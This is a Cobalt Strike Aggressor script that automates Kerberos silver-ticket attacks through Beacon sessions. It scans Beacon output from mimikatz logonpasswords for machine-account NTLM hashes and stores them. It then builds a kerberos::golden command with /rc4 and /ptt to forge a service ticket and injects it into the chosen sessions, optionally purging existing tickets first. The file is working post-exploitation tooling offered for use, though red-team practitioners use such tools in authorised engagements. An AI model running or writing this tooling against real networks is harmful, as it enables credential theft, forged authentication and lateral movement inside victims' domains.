# author: bluescreenofjeff
# GUI to build Silver Tickets for a Beacon session. It also watches Beacon output for machine-account hashes and adds them to the credential store.
# Defaults for the Silver Ticket dialog. The hash is global on purpose: the values
# entered in one dialog run are written back here so they pre-fill the next run.
# The domain and SID below are placeholders -- a ticket only works once they are
# replaced with the target domain's real FQDN and SID (the SID must be the domain
# SID, without a trailing RID).
%globalsettings = %(
	user       => '',
	domain     => 'example.local',
	domain-sid => 'S-1-5-21-000000000-1111111111-2222222222',
	service    => 'cifs',
	purge      => 'false'
);
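# Silver ticket monitor: watches Beacon output (e.g. mimikatz sekurlsa::logonpasswords)
# for machine-account credentials (user name ending in '$') and stores each one in the
# credential store so the Silver Ticket dialog can offer it as a target.
#
# $1 = id of the Beacon that produced the output, $2 = the output text.
on beacon_output {
	local('$pattern $machineaccount $domain $machinehash');

	# mimikatz pads its field labels ("Domain   :", "NTLM     :"), so allow any
	# whitespace before the colon. The hash is pinned to 32 hex characters: a blank
	# or malformed NTLM line is skipped instead of being written to the store, and
	# arbitrary text echoed by a hostile target cannot land in the store as a "hash".
	# NOTE(review): assumes the Domain and NTLM lines follow the Username line
	# directly, with at most an LM line in between -- confirm against the mimikatz
	# build in use.
	$pattern = 'Username\s*: (\S+\$)\s*[\r\n]+\s*\*?\s*Domain\s*: (\S+)\s*[\r\n]+\s*\*?\s*(?:LM\s*:[^\r\n]*[\r\n]+\s*\*?\s*)?NTLM\s*: ([0-9a-fA-F]{32})';

	# hasmatch is an iterator over the string: loop so that every machine account in
	# one output chunk is harvested, not only the first one.
	while ($2 hasmatch $pattern) {
		($machineaccount, $domain, $machinehash) = matched();
		credential_add($machineaccount, $machinehash, $domain, "Silver Ticket Monitor", binfo($1, "internal"));
	}
}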
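# Silver Ticket dialog. Offers every machine-account hash in the credential store as a
# target, then builds a mimikatz kerberos::golden command for the chosen service and
# passes the resulting ticket (/ptt) into each selected Beacon session.
#
# $1 = list of selected Beacon ids (as handed to the beacon_bottom popup).
sub silver-ticket {
	local('@bids @targets $entry $label $dialog');
	@bids = $1;
	@targets = @();

	# Build the "host - ntlm" choices from credentials whose user ends in '$'
	# (machine accounts); the trailing '$' is dropped so the label is the bare
	# host name. Duplicates are collapsed.
	# NOTE(review): the realm is not part of the label, so identically named hosts
	# in two domains collapse into one entry and the first one wins -- confirm that
	# is acceptable for multi-domain engagements.
	foreach $entry (credentials()) {
		if ($entry['user'] ismatch '(.*)\$') {
			$label = matched()[0] . " - " . $entry['password'];
			if ($label !in @targets) {
				add(@targets, $label);
			}
		}
	}

	# Callback: $1 = dialog, $2 = button, $3 = the submitted values. @bids is bound
	# into the closure explicitly because Sleep closures do not see the caller's locals.
	$dialog = dialog("Silver Ticket", %(user => %globalsettings['user'], domain => %globalsettings['domain'], domain-sid => %globalsettings['domain-sid'], service => %globalsettings['service'], purge => %globalsettings['purge']), lambda({
		local('$bid $targethost $targethash $mimikatz_command');

		# Remember the settings so they pre-fill the next invocation.
		%globalsettings['user'] = $3['user'];
		%globalsettings['domain'] = $3['domain'];
		%globalsettings['domain-sid'] = $3['domain-sid'];
		%globalsettings['service'] = $3['service'];
		%globalsettings['purge'] = $3['purge'];

		# The combobox is empty until a machine hash has been captured; refuse to
		# send a kerberos::golden command with no /target and no /rc4 value.
		if ($3['target'] eq "" || " - " !isin $3['target']) {
			show_error("No machine account hash selected. Run logonpasswords on a target first, or add a machine account (user ending in \$) to the credential store.");
			return;
		}
		($targethost, $targethash) = split(' - ', $3['target']);
		if ($targethost eq "" || $targethash eq "") {
			show_error("Target entry is malformed; expected 'host - ntlmhash'.");
			return;
		}

		# /target is the service host's FQDN, /rc4 is that host's machine-account
		# NTLM hash. The command does not depend on the Beacon, so build it once.
		# Values are passed through as typed: a stray space in a field breaks
		# mimikatz's argument parsing, so the dialog fields should be entered bare.
		$mimikatz_command = "kerberos::golden /user:" . $3['user'] . " /domain:" . $3['domain'] . " /sid:" . $3['domain-sid'] . " /target:" . $targethost . "." . $3['domain'] . " /rc4:" . $targethash . " /service:" . $3['service'] . " /ptt";

		foreach $bid (@bids) {
			# Optionally clear the session's ticket cache so the new ticket is the
			# one used for the target service.
			if ($3['purge'] eq 'true') {
				binput($bid, 'mimikatz kerberos::purge');
				bmimikatz($bid, 'kerberos::purge');
			}
			binput($bid, "mimikatz $mimikatz_command");
			bmimikatz($bid, $mimikatz_command);
		}
	}, \@bids));

	dialog_description($dialog, "This dialog generates a silver ticket for the chosen service and injects it into the current session.");
	drow_text($dialog, "user", "User:");
	drow_text($dialog, "domain", "Domain FQDN:");
	drow_text($dialog, "domain-sid", "Domain SID:");
	drow_combobox($dialog, "target", "Target Host:", @targets);
	drow_text($dialog, "service", "Service:");
	drow_checkbox($dialog, "purge", "Purge Kerberos Tray First?");
	dbutton_action($dialog, "Build");
	dialog_show($dialog);
}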
# Context menu entry on the Beacon list. $1 is the list of selected Beacon ids, which
# is handed straight to the dialog so one ticket can be injected into several sessions.
popup beacon_bottom {
	item "Silver Ticket" {
		local('@selected');
		@selected = $1;
		silver-ticket(@selected);
	}
}